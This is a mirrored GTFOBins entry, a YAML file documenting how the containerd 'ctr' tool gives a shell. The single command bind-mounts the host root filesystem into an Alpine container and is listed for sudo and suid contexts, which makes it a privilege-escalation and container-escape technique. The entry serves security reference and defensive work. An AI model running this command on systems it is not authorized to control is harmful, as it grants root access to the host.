mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
16 lines
323 B
Plaintext
16 lines
323 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x
|
|
comment: |-
|
|
An image must be already present, for example:
|
|
|
|
```
|
|
ctr images pull docker.io/library/alpine:latest
|
|
```
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
...
|